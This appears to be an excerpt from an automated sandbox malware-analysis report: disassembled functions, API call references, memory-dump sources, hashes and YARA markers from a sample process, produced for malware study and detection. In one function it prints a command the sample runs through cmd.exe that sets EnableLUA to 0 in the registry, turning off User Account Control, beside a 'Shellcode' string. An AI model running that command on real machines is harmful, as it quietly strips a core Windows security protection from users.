                                                                                                                                                                • Opcode Fuzzy Hash: f0b1b3cef5ee600502cac9cc827a00046fd7a72ae26d3d65b96edc04095a00f7
                                                                                                                                                                • Instruction Fuzzy Hash: DB115471541B16AADE20B770CC46FCF77AEBF80700F804829F29DA7050DB6AB5145E58
                                                                                                                                                                Function 1000925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                                                                                                                                • _free.LIBCMT ref: 100092AB
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100092B6
                                                                                                                                                                • _free.LIBCMT ref: 100092C1
                                                                                                                                                                • _free.LIBCMT ref: 10009315
                                                                                                                                                                • _free.LIBCMT ref: 10009320
                                                                                                                                                                • _free.LIBCMT ref: 1000932B
                                                                                                                                                                • _free.LIBCMT ref: 10009336
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                                                                                                                                • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                                                                                                                                Function 0255F6E5 Relevance: 10.6, APIs: 7, Instructions: 64COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0255F6F2
                                                                                                                                                                • int.LIBCPMT ref: 0255F705
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::_Lockit.LIBCPMT ref: 0255CC49
                                                                                                                                                                  • Part of subcall function 0255CC38: std::_Lockit::~_Lockit.LIBCPMT ref: 0255CC63
                                                                                                                                                                • std::locale::_Getfacet.LIBCPMT ref: 0255F70E
                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0255F745
                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0255F74E
                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0255F76C
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 0255F77B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::exception::exceptionstd::locale::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2287991272-0
                                                                                                                                                                • Opcode ID: 48464c10bc606b213792967713735e740304ad471cfb65aa1aff1fbeafdbedbf
                                                                                                                                                                • Instruction ID: 482d99fa05513feb8299f81f6bf6cee85aa596455c5bafd1bdf729ad4334ad27
                                                                                                                                                                • Opcode Fuzzy Hash: 48464c10bc606b213792967713735e740304ad471cfb65aa1aff1fbeafdbedbf
                                                                                                                                                                • Instruction Fuzzy Hash: D011E73650022AB7CB10FBA8D8658DDBB6AFF81360F100167EC54B7650DB71DE408BD9
                                                                                                                                                                Function 00067241 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 46processCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,00000000,00000000,Shellcode,000D2318), ref: 00067285
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0006DD38,00000027), ref: 00067294
                                                                                                                                                                • CloseHandle.KERNEL32(000C278C,?,?,?,?,?,?,?,?,?,?,?,?,?,0006DD38,00000027), ref: 00067299
                                                                                                                                                                Strings
                                                                                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0006727B
                                                                                                                                                                • Shellcode, xrefs: 00067248
                                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 00067280
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$Shellcode
                                                                                                                                                                • API String ID: 2922976086-1392599029
                                                                                                                                                                • Opcode ID: a00926199a1fb7ef665b07cd3eb217cf2a6663c659f0ffb3496dadc0bddce1b9
                                                                                                                                                                • Instruction ID: eff2838c25e74f30e4cca738b55ac366d27ce7c79d5bc2911de547efc78c3cf2
                                                                                                                                                                • Opcode Fuzzy Hash: a00926199a1fb7ef665b07cd3eb217cf2a6663c659f0ffb3496dadc0bddce1b9
                                                                                                                                                                • Instruction Fuzzy Hash: CCF06DB290021C7EEB009BE9EC86EEFBB7CEB48794F000526F704E6020D5711C048AA1
                                                                                                                                                                Function 6FE9DF57 Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: d8b8077c3a68f9d977b2ee739f9a206cb2e758740413fb2fccd974290ebe14f3
                                                                                                                                                                • Instruction ID: 57e809ee73f461251d739adabaa744eeea44e39b2d0d5438e506e0c745f96434
                                                                                                                                                                • Opcode Fuzzy Hash: d8b8077c3a68f9d977b2ee739f9a206cb2e758740413fb2fccd974290ebe14f3
                                                                                                                                                                • Instruction Fuzzy Hash: 34B1E774A087499FDB11CFA9D840BAD7FB5BF87318F20425AE6109B391C771A942CB70
                                                                                                                                                                Function 02587F14 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __allrem.LIBCMT ref: 025880A1
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025880BD
                                                                                                                                                                • __allrem.LIBCMT ref: 025880D4
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025880F2
                                                                                                                                                                • __allrem.LIBCMT ref: 02588109
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02588127
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                • Opcode ID: 128c5feec073a303b083dbd48ac9b222166113dba12212466992d3776507f185
                                                                                                                                                                • Instruction ID: a3e0f0fd45289bb5f40496d05cc86b0c25defd9af0bbe5f3aad3621cebed9e21
                                                                                                                                                                • Opcode Fuzzy Hash: 128c5feec073a303b083dbd48ac9b222166113dba12212466992d3776507f185
                                                                                                                                                                • Instruction Fuzzy Hash: 508119766007079BD720BB79CC41B7AB7EAFF85324F64462AE511F6280EBF0D5008B58
                                                                                                                                                                Function 000984A9 Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • __allrem.LIBCMT ref: 00098636
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00098652
                                                                                                                                                                • __allrem.LIBCMT ref: 00098669
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00098687
                                                                                                                                                                • __allrem.LIBCMT ref: 0009869E
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000986BC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                • Opcode ID: 0cc3df64ec8b609cca208f86c4b79ba66ebe66d7a71d6932c6b4bd1b972626b4
                                                                                                                                                                • Instruction ID: 992d49183d2ba613b64c011a9e0c99f38edcd3848d4539d998a248e9f9338775
                                                                                                                                                                • Opcode Fuzzy Hash: 0cc3df64ec8b609cca208f86c4b79ba66ebe66d7a71d6932c6b4bd1b972626b4
                                                                                                                                                                • Instruction Fuzzy Hash: 5981C972A00B169BDF249A78CC41BAA73E8EF42724F25852AF511DB782EF70DD04A750
                                                                                                                                                                Function 0258FD56 Relevance: 9.2, APIs: 6, Instructions: 217COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: f7d62bfcd4536771734e9f9eed90d48de249c2f724b732d7b2d135c821bc34fd
                                                                                                                                                                • Instruction ID: bbd635cd00d946fdfbdb8208ca55bb2258079f8bc2e3206a7ec09033fa3c0dce
                                                                                                                                                                • Opcode Fuzzy Hash: f7d62bfcd4536771734e9f9eed90d48de249c2f724b732d7b2d135c821bc34fd
                                                                                                                                                                • Instruction Fuzzy Hash: A651B0335042126BDF24BF64D840BBABBA9FF8D324F644159E948BB640EBB15D02C798
                                                                                                                                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                Function 025907E5 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                                • Opcode ID: 4eca34f9ad51e25921c46ea0e828423f77950f6511442719831784cf2ebdf88a
                                                                                                                                                                • Instruction ID: 16d79d4f0aa9601f927c9e0cdc994b889ccd7a24d29238c2fd183bb8f7015429
                                                                                                                                                                • Opcode Fuzzy Hash: 4eca34f9ad51e25921c46ea0e828423f77950f6511442719831784cf2ebdf88a
                                                                                                                                                                • Instruction Fuzzy Hash: 7951FB72900206AFDF246B69CC40FBE7BAAFF89374F144A19E419E61C1DB31D540CAAD
                                                                                                                                                                Function 6FE80540 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 128COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6FE8057E
                                                                                                                                                                • TlsGetValue.KERNEL32(00000003), ref: 6FE805A2
                                                                                                                                                                • TlsSetValue.KERNEL32(00000000,00000000), ref: 6FE80600
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE80661
                                                                                                                                                                • TlsGetValue.KERNEL32(00000000), ref: 6FE80683
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID: 1o
                                                                                                                                                                • API String ID: 3702945584-528613903
                                                                                                                                                                • Opcode ID: 13628f836f33a4b57c9aa14bcd442a1c14745cdf82df3be8f05f606d4e636e06
                                                                                                                                                                • Instruction ID: 868417d92f8f8cb97bbfecff67e21ab0e047199c144ef7260891b8ada6b910e6
                                                                                                                                                                • Opcode Fuzzy Hash: 13628f836f33a4b57c9aa14bcd442a1c14745cdf82df3be8f05f606d4e636e06
                                                                                                                                                                • Instruction Fuzzy Hash: 5D412970E027018FDB109F68D845B9E7FB5FF82728F24012EE529AB781DB319940CB50
                                                                                                                                                                Function 100015DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _strlen.LIBCMT ref: 10001607
                                                                                                                                                                • _strcat.LIBCMT ref: 1000161D
                                                                                                                                                                • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,1000190E,?,?,00000000,?,00000000), ref: 10001643
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 1000165A
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 10001661
                                                                                                                                                                • lstrcatW.KERNEL32(00001008,?,?,?,?,?,1000190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 10001686
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1922816806-0
                                                                                                                                                                • Opcode ID: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                • Instruction ID: a267a6945d1554df97f4c8e17fbec8689bbb0548aac84132402ab8fad08d9bbc
                                                                                                                                                                • Opcode Fuzzy Hash: 315c55c979a72bdf3ac51594b752bef976f460307e9923370b73d2b1bd80b905
                                                                                                                                                                • Instruction Fuzzy Hash: 9821A776900204ABEB05DBA4DC85FEE77B8EF88750F24401BF604AB185DF34B94587A9
                                                                                                                                                                Function 10001000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 10001038
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 1000104B
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 10001061
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 10001075
                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 10001090
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 100010B8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$AttributesFilelstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3594823470-0
                                                                                                                                                                • Opcode ID: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                • Instruction ID: f5da6160d3db499da992451a69b84f141dc83571de07cfa19ff2ab3d93a8fd2c
                                                                                                                                                                • Opcode Fuzzy Hash: c62e9e5fa69f7526a4dcdb62aa87bf44082eca201cfcddb2e536fed9ba73336f
                                                                                                                                                                • Instruction Fuzzy Hash: DB21E5359003289BEF10DBA0DC48EDF37B8EF44294F104556E999931A6DE709EC5CF50
                                                                                                                                                                Function 10003856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,?,10003518,100023F1,10001F17), ref: 10003864
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003872
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000388B
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,10003518,100023F1,10001F17), ref: 100038DD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                • Opcode ID: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                • Instruction ID: 2a33bd680f99e964f7cdf1ea0b0e713dcb61597015083b2077453114c578dac0
                                                                                                                                                                • Opcode Fuzzy Hash: 669731f2127195b9a905fed2c89c9d5b837464d933d8447bfa53086d9201cd33
                                                                                                                                                                • Instruction Fuzzy Hash: 0F012432608B225EF207D7796CCAA0B2BDDDB096F9B20C27AF510940E9EF219C009300
                                                                                                                                                                Function 6FE9415F Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6FE93F31,6FE90F0A,6FE908EE,?,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280,0000000C,6FE90C1F), ref: 6FE9416D
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FE9417B
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6FE94194
                                                                                                                                                                • SetLastError.KERNEL32(00000000,6FE90B26,?,00000001,?,?,00000001,?,6FEBB280,0000000C,6FE90C1F,?,00000001,?), ref: 6FE941E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                • Opcode ID: 4fb647a3985d4b97dd2453fdc731d46d62f3fb04ab1f03ab164e6f67d5d6e769
                                                                                                                                                                • Instruction ID: f36ce4c38a4ca60392f15f4bf0ab1666bb2dc7f408f19fce5a489a6d046a4a02
                                                                                                                                                                • Opcode Fuzzy Hash: 4fb647a3985d4b97dd2453fdc731d46d62f3fb04ab1f03ab164e6f67d5d6e769
                                                                                                                                                                • Instruction Fuzzy Hash: CE01247260CB112EE71516BA7C8550B2E98EB4337E730832FE530451D0EF519C354260
                                                                                                                                                                Function 6FE77550 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 309COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6FE778E3, 6FE77900
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in>(), xrefs: 6FE7791D, 6FE7795A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
